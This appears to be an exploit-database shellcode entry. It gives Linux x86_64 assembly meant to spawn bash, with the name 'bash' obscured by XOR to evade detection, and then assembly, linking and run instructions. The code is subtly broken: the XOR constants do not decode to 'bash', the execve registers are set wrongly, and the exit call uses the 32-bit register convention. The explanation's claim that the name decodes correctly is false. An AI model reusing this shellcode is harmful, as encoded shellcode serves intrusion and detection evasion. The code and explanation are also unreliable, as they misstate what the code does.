Exploit Title: Linux/x86_64 - bash shellcode with xor encoding Date: 05/02/2023 Exploit Author: Jeenika Anadani Contact: https://twitter.com/cyber_jeeni Category: Shellcode Architectue: Linux x86_64 Shellcode Length: 71 Bytes ----------------------- section .data section .text global _start _start: ; set up argv and envp arrays for execve() xor rax, rax mov [rsp-8], rax mov qword [rsp-16], 0x72613162 ; encrypted 'bash' xor byte [rsp-16], 0x08 xor byte [rsp-15], 0x16 xor byte [rsp-14], 0x24 xor byte [rsp-13], 0x32 lea rdx, [rsp-16] mov qword [rsp-24], rdx mov qword [rsp-32], rdx lea rdi, [rsp-32] ; call execve() xor eax, eax mov al, 59 syscall ; exit with status code 0 xor eax, eax mov ebx, eax mov al, 60 syscall ----------- #### Explanation: This code uses XOR encryption to obscure the name of the program being executed, `"bash"`. The XOR encryption key is `0x08162432`, which is applied to each byte of the string. The decryption is performed just before calling `execve`, so the program name is passed in its original form. The rest of the code is the same as the previous example, making a system call to the `execve` function and then calling the `exit` syscall to terminate the process. --------- ### Compilation AND Execution: To run the x86_64 assembly code on a Linux system, you need to assemble it into an executable file and then run the file. Here are the steps: 1. Save the code to a file with a `.asm` extension, for example `bash.asm`. 2. Assemble the code into an object file using an assembler, such as NASM: `nasm -f elf64 -o bash.o bash.asm` The `-f elf64` option specifies that the output format should be ELF64 (Executable and Linkable Format), and the `-o` option specifies the name of the output file, `bash.o`. 3. Link the object file to produce an executable file using the `ld` linker: `ld -s -o bash bash.o` The `-s` option removes the symbol table from the output file to make it smaller, and the `-o` option specifies the name of the output file, `bash`. 4. Make the file executable: `chmod +x bash` 5. Finally, you can run the file: `./bash` ---------------------